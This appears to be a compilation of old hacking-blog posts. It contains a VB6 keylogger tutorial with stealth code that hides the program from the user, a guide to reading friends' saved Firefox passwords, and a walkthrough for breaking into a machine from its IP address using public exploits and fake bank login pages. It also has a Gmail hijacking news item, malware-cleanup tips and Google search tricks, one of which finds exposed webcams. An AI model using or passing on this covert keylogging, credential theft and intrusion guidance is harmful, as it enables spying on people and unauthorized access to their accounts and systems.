+ How To Write A Basic Keylogger In VB

Intro: What a Keylogger is made of

Before we start programming, we need to answer a basic question: what is a keylogger? As the name implies (key+logger) – a keylogger is a computer program that logs (records) the keys (keyboard buttons) pressed by a user. This should be simple to understand. Lets say that I am doing something at my computer. A keylogger is also running (working) on this computer. This would mean that the keylogger is “listening” to all the keys I am pressing and it is writing all the keys to a log file of some sort. Also, as one might have guessed already, we don’t want the user to know that their keys are being logged. So this would mean that our keylogger should work relatively stealth and must not, in any case, show its presence to the user. Good, now we know what a keylogger as and we have an idea of its functions, lets move on to the next step.

=========================================

Basic Concepts: What needs to be achieved

=========================================

Ok, now lets plan our program, what should such keyloger do and what it should not. Significant difference to previous section is in the sense that here we shall discuss the LOGIC, the instructions that our program will follow.

Keylogger will:

1 – listen to all the key strokes of the user.

2 – save these keys in a log file.

3 – during logging, does not reveal its presence to the user.

4 – keeps doing its work as long as the used is logged on regardless of users actions.

==========================================

Implementation: Converting logic into code

==========================================

We shall use Visual Basic because it is much easier and simple to understand comparing to C++ or Java as far as novice audience is concerned. Although programmers consider it somewhat lame to code in VB but truthfully speaking, its the natural language for writing hacking/cracking programs. Lets cut to the chase – start your VB6 environment and we are ready to jump the ride!

We need a main form, which will act as HQ to the program.

First of all, as our program shall run, we need to make sure it is hidden. This should be very simple to accomplish:

Private Sub Form_Load()

Me.Visisble = False

End Sub

This makes our program invisible to the human eye. To make it invisible to computers eye too, we need to add this line in the Form_Load() event App.TaskVisible = False . This enabled our logger to run in stealth mode and the regular Task Manager will not see our application. Although it will still be possible to see it in the processes tab, there are “ways” to make it hidden. Figure them out yourself, they have nothing to do with programming.

OK, now that our program has run in stealth mode, it should do its essential logging task. For this, we shall be using a whole load of API. These are the interfaces that the Application Platform (windows) itself provides us in those annoying dll files.

There are 3 methods to listen for keys:

* GetAsyncKeyState

* GetKeyboardState

* Windows Hooks

Althought the last method is easier to use, this will not work on Windows98 and also it is NOT very precise. Many people use it, but as my experiences revealed, Keyboard Hooks are only a good way of blocking keys and nothing else. The most exact and precise method in my experience is GetAsyncKeyState().

So lets use this function, but where is that damn thing and how to use it?

Private Declare Function GetAsyncKeyState Lib “USER32″ (ByVal vKey As Long) As Integer

This is how we use a function already present in a dll file. In this case we are using the user32.dll and the function we are using is GetAsyncKeyState(). The arguments (Long vKey), and return value (Long) shall be discussed later, right now its enough to know that this function can listen to keystrokes.

What we need next is to run this function infinitely (as long as the system is running). To do this, just put a Timer control on the form and name it tmrTimer. This timer is used to run the same line of code forever. Note that a while loop with a universally true condition would also accomplish same, but the while loop will certainly hang the system and will lead to its crash as opposed to timer. Timer will not hang the system at all because a while loop tends to carry out the instruction infinitely WITHOUT any break and it also keeps the control to itself, meaning that we cannot do any other job as the loop is running (and with a universally true statement, the while loop will not let the control pass to ANYWHERE else in the program making all the code useless) while the Timer control just carries out the instuction after a set amount of time.

So the two possibilities are:

Do While 1=1

‘our use of the GAKS (GetAsyncKeyState) function Loop

and

Private Sub tmrTimer_Timer()

‘our use of the GAKS function

End Sub

Timer being set, lets move on to see how the GAKS function works and how are we going to use it. Basically what the GAKS function does is that it tells us if a specific key is being pressed or not. We can use the GAKS function like this: Hey GAKS() check if the ‘A’ key is being pressed. And the GAKS function will tell us if it is being pressed or not. Sadly, we can’t communicate with processors like this, we have to use some flamboyant 007 style

If GAKS(65)<>0 Then

Msgbox “The ‘A’ key is being pressed”

Else

Msgbox “The ‘A’ key is not being pressed”

End If

Now lets see how this code works: GAKS uses ASCII key codes and 65 is the ASCII code for ‘A’ If the ‘A’ key is being pressed then GAKS will return a non-zero value (often 1) and if the key is not being pressed then it will return 0. Hence If GAKS(65)<>0 will be comprehended by the VB compiler as “If the ‘A’ key is being pressed”.

Sticking all this stuff together, we can use this code to write a basic functional keylogger:

Private Sub tmrTimer_Timer()

Dim i As Integer

Static data As String

For i = 65 to 90 ‘represents ASCII codes from ‘A’ to ‘Z’

If GAKS(i)<>0 Then data = data & Chr(i)

Next i

If GAKS(32) <> 0 Then data = data & ” ” ‘checking for the space bar

If Len(data)>=100 Then

Msgbox “The last 100 (or a couple more) are these ” & VBNewLine & data

data = “”

End If

End Sub

This alone is enough to create a basic functioning keylogger although it is far from practical use. But this does the very essential function of keylogger. Do try it and modify it to your needs to see how GAKS works and how do the Timer delays affect the functionality of a keylogger. Honestly speaking, the core of our keylogger is complete, we have only to sharpen it now and make it precise, accurate and comprehensive.

The first problem that one encounters using GAKS is that this function is far too sensitive than required. Meaning that if we keep a key pressed for 1/10th of a second, this function will tell us that the key has been pressed for at least 2 times, while it actually was a sigle letter. For this, we must sharpen it. We need to add what I call “essential time count” to this function. This means that we need to tell it to generate a double key press only if the key has been pressed for a specified amount of time. For this, we need a whole array of counters. So open your eyes and listen attentively.

Dim count(0 to 255) As Integer

This array is required for remembering the time count for the keys. i.e. to remember for how long the key has been pressed.

Private Sub tmrTimer_Timer()

Dim i As Integer

Const timelimit As Integer = 10

Static data As String

For i=0 To 255 ‘for all the ASCII codes

If GAKS(i)<>0 Then

If count(i) = 0 Then ‘if the key has just been pressed

data = data & Chr(i)

ElseIf count(i) < timelimit Then

count(i) = count(i) + 1 ‘add 1 to the key count

Else

count(i) = 0 ‘initialize the count

data = data & Chr(i)

End If

Else ‘if the key is not being pressed

count(i) = 0

End If

Next i

End Sub

What we have done here is that we have set a time limit before the GAKS function will tell us that the key is being pressed. This means, in simple words, that if we press and hold the ‘A’ key, the GAKS function will not blindly tell us the ‘A’ key is being pressed, but it will wait for sometime before telling us again that the key is being pressed. This is a very important thing to do, because many users are not very fast typists and tend to press a key for somewhat longer than required.

Now what is left (of the basic keylogger implementation) is just that we write the keys to a file. This should be very simple:

Private Sub timrTimer_Timer()

‘do all the fuss and listen for keystrokes

‘if a key press is detected

Open App.Path & “\logfile.txt” For Append As #1

Print #1, Chr(keycode);

Close #1

End Sub

Note that this is the very basic concept of writing a keylogger, we have yet not added autostart option and neither have we added an post-compile functionality edit options. These are advanced issues for the beginners. If you would like me to write about them, do tell me and I will write about them too, step by step. Please do comment on this article, telling me what it lacks and what was not required in it. Feel free to post this anywhere you like, just make sure you don’t use it for commercial purposes. If you have any questions about any part of it let me know and I will try to answer.

+ Hack your friends Internet Password

This is Really Amazing. I was moving through my Browser’s settings and found the file where all the passwords are stored. I was really shocked that it allowed me to have a look at all the Username and Password which I had asked my computer to remember which also included my Internet Username and Password. But this is only possible in Mozila Firefox.

To Hack your friends Password you only need even less than a minute and you can have a quick look at your friends Usernames and Passwords.

Just follow the following steps:

1. Open Mozila Firefox

2. Goto Tools -> Options

3. In that goto Privacy -> Passwords.

4. There you will find View Saved Passwords Button Click on it.

5. It will show you a list of websites with the usernames. To get the Passwords Click on Show Passwords Button.

6. Now To get the Internet Password Just see for any IP address in the website column this is the Ip address of that computer and Username and Pass is what you want.

7. You can get pass of any account just look for the site name whose password you want to hack and on the right side you will get the Username and Password

+ Recover your forgotten Passwords without spending a single buck(free)

Most of the people have this problem of having forgotten the passwords. But now it is possible to recover your password without using any software and without spending a single buck. This is very simple.

Note : The only condition that has to be followed is that you should be using firefox as your default browser.

This is done in the same way as in my previous post “Hack your Friends Internet Password” .

First open your Firefox explorer.

Now goto Tools -> Options

In Options goto Security.

In that goto Passwords -> Show Passwords

Now to find out the forgotten password just scroll through the list and search for the name of site whose password has been forgotten and after reaching to that site click on show passwords and the passwords will be visible on the right side.

+ Gmail Account Hacking Tool

A tool that automatically steals IDs of non-encrypted sessions and breaks into Google Mail accounts has been presented at the Defcon hackers’ conference in Las Vegas.

Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed the tool is planning to release it in two weeks.

When you log in to Gmail the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually hit the sign out button. When you hit sign out this cookie is cleared.

Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done. According to Google this behavior was chosen because of low-bandwidth users, as SLL connections are slower.

The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for an attacker sniffing traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. Once this happens the attacker can log in to the account without the need of a password. People checking their e-mail from public wireless hotspots are obviously more likely to get attacked than the ones using secure wired networks. Todd Mumford, from the SEO company called SEO Visions Inc, states “This can be a serious problem for Internet Marketers who travel often and use their wireless laptops and Gmal services often and do not always have access to a secure connection”

Perry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.”

If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.

+ HOW TO HACK WITH A IP ADDRESS

So say somehow somewhere we ended up choosing a target to start wreaking havoc upon. All we need is an IP Address. Theres plenty of papers out there that go into how to obtain an IP Address from the preferred mark of your choice. So I'm not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.

 1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.

 Example 1:

Idlescan using Zombie (192.150.13.111:80); Class: Incremental

Interesting ports on 208.225.90.120:

(The 65522 ports scanned but not shown below are in state: closed)

Port State Service

21/tcp open ftp

25/tcp open smtp

80/tcp open http

111/tcp open sunrpc

135/tcp open loc-srv

443/tcp open https 1027/tcp open IIS

1030/tcp open iad1

2306/tcp open unknown

5631/tcp open pcanywheredata

7937/tcp open unknown

7938/tcp open unknown

36890/tcp open unknown

 In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we dont even know what type of software or what operating system that this system is running.

 2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.

 So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.

So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25.

 220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400

 Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8' Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.

 At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I dont recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.

 There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter http://www.bank.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.bank.com. You need to have a small script set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doenst give it a second thought and will simply try again later.

 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

So as a summary of how to 0Wn a box when you only have an IP Address

Method Works On BOTH *Nix and Windoze

****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****

- Port Scan The Address And Record Open Ports

- Telnet To Open Ports To Identify Software Running On Ports

3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports

- Record Banners And Take Note Of The Application Running and The Version Number

- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google.

- Make a copy of some Proof-Of-Concept code for the vulnerability.

*Read the documentation if there is any, for the proof-of-concept code you will be using for your exploit*

- Run The Exploit Against The Victim.

- Reap The Cheap-Sh0t Ownage

------------------------------------------------------------------------------------------------------------------------------------

**This document does not go into covering your tracks. If you dare try any of this stuff on a box you dont have consent to hack on, They will simply look at the logs and see your IP Address and then go straight to your ISP. Once you get more 1337 you get to learn how to get away with the nasty deeds. This is what the majority of kode-kiddies do when they perform attacks. The key is to enumerate all the info you can from the machine, the more info you have on the system the better. User accounts can also be enumerated. Once you have a list of account names, you may then proceed to brute-force or perform a cryptanalysis attack to gain control of the account. Then you must work on privilage escalation. Users are not Admins/Root.**

+ How Not to GeT HACKED

Protect Urself:

Follow These Simple Guidelines.

1. Stop using Internet Explorer and make the switch to Opera, it's more secure, plain and simple.

2. Get Spybot Search and Destroy or Spyware Doctor and immediately update it.

3. Get Adaware SE and immediately update it.

(Use both as a 1-2 punch on infected client computers and between the two there's not much they won't kill)

4. Update your anti virus

5. Boot into safe mode and run all three scans

6. While the scans are going check your registry (Click start --> Run and type regedit to get intot he registry) and look in HKEY_CurrentUser/software/microsoft/windows/currentversion/run & HKEY_Local_Machine/software/microsoft/windows/currentversion/run. Verify that all programs listed are legitimate and wanted.

7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it.

8. Use explorer to go to the windows/system32 folder and sort by date. If you haven't already done so, make sure you can see the entire file names. click Tools --> Folder Options and unclick the box labeled "Hide extensions for known file types" and under Hidden files and folders click "Show hidden files and folders." However, make sure you choose "Hide protected operating system files" so you don't accidentally remove anything that would cripple your computer.. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe.

9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can't get a clean scan in regular mode then you have something more persistant that could take more research.

10. Make sure your firewall doesn't have strange exceptions.

11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your passwords.

12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows.

    Good Luck !!

+ 101 Google Tricks, Tips & Hacks

1. The best way to begin searching harder with Google is by clicking the Advanced Search link.

2. This lets you search for exact phrases, "all these words", or one of the specified keywords by entering search terms into the appropriate box.

3. You can also define how many results you want on the page, what language and what file type you're looking for, all with menus.

4. Advanced Search lets you type in a Top Level Domain (like .co.uk) in the "Search within site of domain" box to restrict results.

5. And you can click the "Date, usage rights, numeric range and more" link to access more advanced features.

6. Save time – most of these advanced features are also available in Google's front page search box, as command line parameters.

7. Google's main search invisibly combines search terms with the Boolean construct "AND". When you enter smoke fire – it looks for smoke AND fire.

8. To make Google search for smoke or fire, just type smoke OR fire

9. Instead of OR you can type the | symbol, like this: smoke | fire

10. Boolean connectors like AND and OR are case sensitive. They must be upper case.

11. Search for a specific term, then one keyword OR another by grouping them with parentheses, like this: water (smoke OR fire)

12. To look for phrases, put them in quotes: "there's no smoke without fire"

13. Synonym search looks for words that mean similar things. Use the tilde symbol before your keyword, like this: ~eggplant

14. Exclude specific key words with the minus operator. new pram -ebay excludes all results from eBay.

15. Common words, like I, and, then and if are ignored by Google. These are called "stop words".

16. The plus operator makes sure stop words are included. Like: fish +and chips

17. If a stop word is included in a phrase between quote marks as a phrase, the word is searched for.

18. You can also ask Google to fill in a blank. Try: Christopher Columbus discovered *

19. Search for a numerical range using the numrange operator. For example, search for Sony TV between £300 and £500 with the string Sony TV £300..£500

20. Google recognises 13 main file types through advanced search, including all Microsoft Office Document types, Lotus, PostScript, Shockwave Flash and plain text files.

21. Search for any filetype directly using the modifier filetype:[filetype extension]. For example: soccer filetype:pdf

22. Exclude entire file types, using the same Boolean syntax we used to exclude key words earlier: rugby -filetype:doc

23, In fact, you can combine any Boolean search operators, as long as your syntax is correct. An example: "sausage and mash" -onions filetype:doc

24. Google has some very powerful, hidden search parameters, too. For example "intitle" only searches page titles. Try intitle:herbs

25. If you're looking for files rather than pages – give index of as the intitle: parameter. It helps you find web and FTP directories.

26. The modifier inurl only searches the web address of a page: give inurl:spices a go.

27. Find live webcams by searching for: inurl:view/view.shtml

28. The modifier inanchor is very specific, only finding results in text used in page links.

29. Want to know how many links there are to a site? Try link:sitename – for example link:www.mozilla.org

30. Similarly, you can find pages that Google thinks are related in content, using the related: modifier. Use it like this: related:www.microsoft.com

31. The modifier info:site_name returns information about the specified page.

32. Alternatively, do a normal search then click the "Similar Pages" link next to a result.

33. Specify a site to search with the site: modifier – like this: search tips site:www.techradar.com

34. The above tip works with directory sites like www.dmoz.org and dynamically generated sites.

35. Access Google Directory – a database of handpicked and rated sites – at directory.google.com

36. The Boolean operators intitle and inurl work in Google directory, as does OR.

37. Use the site: modifier when searching Google Images, at images.google.com. For example: dvd recorder site:www.amazon.co.uk

38. Similar, using "site:.com" will only return results from .com domains.

39. Google News (news.google.com) has its own Boolean parameters. For example "intext" pulls terms from the body of a story.

40. If you use the operator "source:" in Google News, you can pick specific archives. For example: heather mills source:daily_mail

41. Using the "location:" filter enables you to return news from a chosen country. location:uk for example.

42. Similarly, Google Blogsearch (blogsearch.google.com) has its own syntax. You can search for a blog title, for example, using inblogtitle:

43. The general search engine can get very specific indeed. Try movie: to look for movie reviews.

44. The modifier film: works just as well!

45. Enter showtimes and Google will prompt you for your postcode. Enter it and it'll tell you when and where local films are showing.

46. For a dedicated film search page, go to www.google.co.uk/movies

47. If you ticked "Remember this Location" when you searched for show times, the next time you can enter the name of a current film instead.

48. Google really likes movies. Try typing director: The Dark Knight into the main search box.

49. For cast lists, try cast: name_of_film

50. The modifier music: followed by a band, song or album returns music reviews.

51. Try searching for weather London – you'll get a full 4-day forecast.

52. There's also a built-in dictionary. Try define: in the search box.

53. Google stores the content of old sites. You can search this cache direct with the syntax keyword cache:site_url

54. Alternatively, enter cache:site_url into Google's search box to be taken direct to the stored site.

55. No calculator handy? Use Google's built in features. Try typing 12*15 and hitting "Google Search".

56. Google's calculator converts measurements and understands natural language. Type in 14 stones in kilos, for example.

57. It does currency conversion too. Try 200 pounds in euros

58. If you know the currency code you can type 200 GBP in EUR instead for more reliable results.

59. And temperature! Just type: 98 f to c to convert Fahrenheit to Centigrade.

60. Want to know how clever Google really is? Type 2476 in roman numerals, then hit "Google Search"...

61. You can personalise your Google experience by creating a Google account. Go to www.google.com/account/ then click "Create Account".

62. With a Google account there are lots more extras available. You'll get a free Gmail email account for one...

63. With your Google account, you can also personalise your front page. Click "iGoogle" to add blog and site feeds.

64. Click "Add a Tab" in iGoogle to add custom tabs. Google automatically populates them with suitable site suggestions.

65. iGoogle allows you to theme your page too. Click "Select Theme" to change the default look.

66. Some iGoogle themes change with time..."Sweet Dreams" is a theme that turns from day to night as you browse.

67. Click "More" under "Try something new" to access a full list of Google sites and new features.

68. "Custom Search" enables you to create a branded Google search for your own site.

69. An active, useful service missing from the list is "Personalised Search" – but you can access it via www.google.com/psearch when you're logged in.

70. This page lists searches you have recently made – and is divided into categories. Clicking "pause" stops Google from recording your history.

71. Click "Trends" to see the sites you visit most, the terms you enter most often and links you've clicked on!

72. Personalised Search also includes a bookmark facility – which enables you to save bookmarks online and access them from anywhere.

73. You can add bookmarks or access your bookmarks using the iGoogle Bookmarks gadget.

74. Did you know you can search within your returned results? Scroll down to the bottom of the search results page to find the link.

75. Search locally by appending your postcode to the end of query. For example Indian food BA1 2BW finds restaurants in Bath, with addresses and phone numbers!

76. Looking for a map? Just add map to the end of your query, like this: Leeds map

77. Google finds images just as easily and lists them at the top, when you add image to the end of your search.

78. Google Image Search recognises faces... add &imgtype=face to the end of the returned URL in the location bar, then hit enter to filter out pictures that aren't people.

79. Keeping an eye on stocks? Type stocks: followed by market ticker for the company and Google returns the data from Google Finance.

80. Enter the carrier and flight number in Google's main search box to return flight tracking information.

81. What time is it? Find out anywhere by typing time then the name of a place.

82. You may have noticed Google suggests alternate spellings for search terms – that's the built in spell checker!

83. You can invoke the spell checker directly by using spell: followed by your keyword.

84. Click "I'm Feeling Lucky" to be taken straight to the first page Google finds for your keyword.

85. Enter a statistics-based query like population of Britain into Google, and it will show you the answer at the top of its results.

86. If your search has none-English results, click "Translate this Page" to see it in English.

87. You can search foreign sites specifically by clicking "Language Tools", then choosing which countries sites to translate your query to.

88. Other features on the language tools page include a translator for blocks of text you can type or cut and paste.

89. There's also a box that you can enter a direct URL into, translating to the chosen language.

90. Near the language tools link, you'll see the "Search Preferences". This handy page is full of secret functionality.

91. You can specify which languages Google returns results in, ticking as many (or few) boxes as you like.

92. Google's Safe Search protects you from explicit sexual content. You can choose to filter results more stringently or switch it off completely.

93. Google's default of 10 results a page can be increased to up to 100 in Search Preferences, too.

94. You can also set Google to open your search results in a new window.

95. Want to see what others are searching for or improve your page rank? Go to www.google.com/zeitgeist

96. Another useful, experimental search can be found at www.google.com/trends – where you can find the hottest search terms.

97. To compare the performance of two or more terms, enter them into the trends search box separated by commas.

98. Fancy searching Google in Klingon? Go to www.google.com/intl/xx-klingon

99. Perhaps the Swedish chef from the muppets is your role model instead? Check www.google.com/intl/xx-bork

100. Type answer to life, the universe and everything into Google. You may be surprised by the result...

101. It will also tell you the number of horns on a unicorn.

+ 20 Great Google Secrets

Google is clearly the best general-purpose search engine on the Web

But most people don’t use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google’s index, it’s still a struggle to pare results to a manageable number.

But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google’s search options go beyond simple keywords, the Web, and even its own programmers. Let’s look at some of Google’s lesser-known options.

Syntax Search Tricks

Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at:

www.google.com/help/operators.html

Here are some advanced operators that can help narrow down your search results.

Intitle: at the beginning of a query word or phrase (intitle:”Three Blind Mice”) restricts your search results to just the titles of Web pages.

Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you’re searching for might commonly appear in URLs. If you’re looking for the term HTML, for example, and you don’t want to get results such as

www.mysite.com/index.html

You can also enter intext:html.

Link: lets you see which pages are linking to your Web page or to another page you’re interested in. For example, try typing in

link:http://www.hungry-hackers.com

Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:”Mark Twain”site:edu. Experiment with mixing various elements; you’ll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature

(www.google.com/help/features.html#calculator)

Lets you do both math and a variety of conversions from the search box. For extra fun, try the query “Answer to life the universe and everything.”

Let Google help you figure out whether you’ve got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try “thre blund mise”) and Google may suggest a proper spelling. This doesn’t always succeed; it works best when the word you’re searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you’re searching for “three blind mice,” underneath the search window will appear a statement such as Searched the web for “three blind mice.”) You’ll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Suppose you want to contact someone and don’t have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you’ll see it at the top of the search results along with a map link to the address. If you’d rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you’d rather use a search form for business phone listings, try Yellow Search

(www.buzztoolbox.com/google/yellowsearch.shtml).

Extended Googling

Google offers several services that give you a head start in focusing your search. Google Groups

(http://groups.google.com)

indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle

CODE

(http://froogle.google.com),

which indexes products from online stores, and Google Catalogs

CODE

(http://catalogs.google.com),

which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google’s tools and services at

www.google.com/options/index.html

You’re probably used to using Google in your browser. But have you ever thought of using Google outside your browser?

Google Alert

(www.googlealert.com)

monitors your search terms and e-mails you information about new additions to Google’s Web index. (Google Alert is not affiliated with Google; it uses Google’s Web services API to perform its searches.) If you’re more interested in news stories than general Web content, check out the beta version of Google News Alerts

(www.google.com/newsalerts).

This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)

Google on the telephone? Yup. This service is brought to you by the folks at Google Labs

(http://labs.google.com),

a place for experimental Google ideas and features (which may come and go, so what’s there at this writing might not be there when you decide to check it out). With Google Voice Search

(http://labs1.google.com/gvs.html),

you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don’t expect 100 percent success.

In 2002, Google released the Google API (application programming interface), a way for programmers to access Google’s search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you’ll need an API key, which is available free from

CODE

www.google.com/apis

Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You’ll be amazed at how many different ways Google can improve your Internet searching.

Online Extra: More Google Tips

Here are a few more clever ways to tweak your Google searches.

Search Within a Timeframe

Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic’s current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as

CODE

http://aa.usno.navy.mil/data/docs/JulianDate.html

excl.gif No Active Links, Read the Rules – Edit by Ninja excl.gif), but an easier way is to do a Google daterange: search by filling in a form at

www.researchbuzz.com/toolbox/goofresh.shtml or www.faganfinder.com/engines/google.shtml

If one special syntax element is good, two must be better, right? Sometimes. Though some operators can’t be mixed (you can’t use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.

More Google API Applications

Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query

(www.staggernation.com/gawsh/).

When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL

(www.staggernation.com/garbo/).

Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it’s not something you’d do every day, but if your cell phone does e-mail and doesn’t do Web browsing, this is a very handy address to know.